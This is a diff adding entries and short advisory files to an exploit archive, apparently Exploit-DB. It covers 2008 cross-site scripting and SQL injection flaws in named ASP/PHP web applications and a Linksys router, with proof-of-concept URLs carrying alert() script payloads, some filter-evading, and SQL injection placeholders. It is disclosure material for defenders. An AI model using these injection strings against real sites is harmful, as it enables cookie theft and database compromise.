Updated 04_01_2014

files.csv

@@ -29359,3 +29359,23 @@ id,file,description,date,author,platform,type,port
 32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script Cross Site Scripting Vulnerability",2008-11-20,"Vahid Ezraeil",php,webapps,0
 32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x XML Parsing Remote Denial Of Service Vulnerability",2008-11-20,"Christian Hoffmann",multiple,dos,0
 32597,platforms/php/webapps/32597.txt,"Pilot Group PG Roommate SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0
+32598,platforms/php/webapps/32598.txt,"COMS 'dynamic.php' Cross Site Scripting Vulnerability",2008-11-24,Pouya_Server,php,webapps,0
+32599,platforms/hardware/remote/32599.txt,"Linksys WRT160N 'apply.cgi' Cross-Site Scripting Vulnerability",2008-11-27,"David Gil",hardware,remote,0
+32600,platforms/php/webapps/32600.txt,"AssoCIateD 1.4.4 'menu' Parameter Cross Site Scripting Vulnerability",2008-11-27,"CWH Underground",php,webapps,0
+32601,platforms/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro 'Keyword' Parameter Cross Site Scripting Vulnerability",2008-11-29,"Charalambous Glafkos",asp,webapps,0
+32602,platforms/asp/webapps/32602.txt,"Multiple Ocean12 Products 'Admin_ID' Parameter SQL Injection Vulnerability",2008-11-29,"Charalambous Glafkos",asp,webapps,0
+32603,platforms/asp/webapps/32603.txt,"Ocean12 Mailing LisManager Gold 2.04 'Email' Parameter SQL Injection Vulnerability",2008-11-29,"Charalambous Glafkos",asp,webapps,0
+32604,platforms/asp/webapps/32604.txt,"ParsBlogger 'blog.asp' Cross Site Scripting Vulnerability",2008-11-29,Pouya_Server,asp,webapps,0
+32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0
+32606,platforms/php/webapps/32606.txt,"Basic CMS 'q' Parameter Cross Site Scripting Vulnerability",2008-11-29,Pouya_Server,php,webapps,0
+32607,platforms/php/webapps/32607.txt,"RakhiSoftware Shopping Cart product.php Multiple Parameter XSS",2008-11-28,"Charalambous Glafkos",php,webapps,0
+32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart PHPSESSID Cookie Manipulation Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0
+32609,platforms/asp/webapps/32609.txt,"Pre Classified Listings 1.0 'detailad.asp' SQL Injection Vulnerability",2008-12-01,Pouya_Server,asp,webapps,0
+32610,platforms/asp/webapps/32610.txt,"Pre Classified Listings 1.0 'signup.asp' Cross Site Scripting Vulnerability",2008-12-01,Pouya_Server,asp,webapps,0
+32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script Cross Site Scripting Vulnerability",2008-12-01,Pouya_Server,asp,webapps,0
+32612,platforms/php/webapps/32612.txt,"Softbiz Classifieds Script showcategory.php radio Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
+32613,platforms/php/webapps/32613.txt,"Softbiz Classifieds Script advertisers/signinform.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
+32614,platforms/php/webapps/32614.txt,"Softbiz Classifieds Script gallery.php radio Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
+32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script lostpassword.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
+32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script admin/adminhome.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
+32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script admin/index.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0

platforms/asp/webapps/32601.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32526/info
+
+Ocean12 FAQ Manager Pro is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/default.asp?Action=Search&Keyword=<script>alert("xssed")</script>

platforms/asp/webapps/32602.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/32527/info
+
+Multiple Ocean12 products are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following applications are vulnerable:
+
+Ocean12 FAQ Manager Pro
+Ocean12 Poll Manager Pro 
+
+http://www.example.com/login.asp?Admin_ID=[SQL]&Password=pass 

platforms/asp/webapps/32603.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32528/info
+
+Ocean12 Mailing List Manager Gold is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Ocean12 Mailing List Manager Gold 2.04 is vulnerable; other versions may also be affected.
+
+http://www.example.com/default.asp?Page=2&Email=[SQL]&Password=pass&Password2=pass&FirstName=name&LastName=lastname&MailType=0 

platforms/asp/webapps/32604.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32529/info
+
+ParsBlogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/[patch]/blog.asp?=>"&#039;><ScRiPt>alert(1369)</ScRiPt>

platforms/asp/webapps/32609.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32566/info
+
+Pre Classified Listings is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+All versions are considered vulnerable. 
+
+http://www.example.com/[Path]/home/detailad.asp?siteid=[SQL] 

platforms/asp/webapps/32610.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32567/info
+
+Pre Classified Listings is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+All versions are considered vulnerable. 
+
+http://www.example.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start 

platforms/asp/webapps/32611.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32568/info
+
+CodeToad ASP Shopping Cart Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/?>"'><ScRiPt>alert(1369)</ScRiPt> 

platforms/hardware/remote/32599.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32496/info
+
+Linksys WRT160N is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue by enticing victims into opening a malicious URI.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials, cause denial-of-service conditions, and launch other attacks. 
+
+http://www.example.com/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15 

platforms/php/webapps/32598.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/32459/info
+
+COMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new
+

platforms/php/webapps/32600.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32499/info
+
+AssoCIateD (ACID) is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ACID 1.4.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[acid_path]/index.php?p=search&menu=[XSS] 

platforms/php/webapps/32605.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/32530/info
+
+Venalsur Booking Centre is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/cadena_paquetes_ext.php?HotelID=pouya_Server&PaqueteID=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
+http://www.example.com/hotel.php?HotelID=<script>alert(1369)</script>

platforms/php/webapps/32606.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32531/info
+
+Basic CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/pages/index.php?q=<script>alert(1369)</script>

platforms/php/webapps/32607.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32563/info
+
+RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.
+
+Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1
+
+http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>

platforms/php/webapps/32608.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32563/info
+ 
+RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.
+ 
+Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Set Cookie: PHPSESSID=' 

platforms/php/webapps/32612.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32569/info
+
+Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/showcategory.php?cid=9&type=1&keyword=Pouya&radio=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt

platforms/php/webapps/32613.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32569/info
+ 
+Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/advertisers/signinform.php?msg=</title><ScRiPt%20%0a%0d>alert(455695710637)%3B</ScRiPt>&show_form=no

platforms/php/webapps/32614.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32569/info
+  
+Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+http://www.example.com/gallery.php?type=2&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(436145568828)%3B</ScRiPt>&cid=0

platforms/php/webapps/32615.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32569/info
+   
+Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+http://www.example.com/lostpassword.php?msg=<ScRiPt%20%0a%0d>alert(434915558474)%3B</ScRiPt

platforms/php/webapps/32616.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32569/info
+    
+Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+http://www.example.com/admin/adminhome.php?tmp=1&msg=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(477365890784)%3B</ScRiPt

platforms/php/webapps/32617.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32569/info
+     
+Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+     
+http://www.example.com/admin/index.php?msg=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(476295881324)%3B</ScRiPt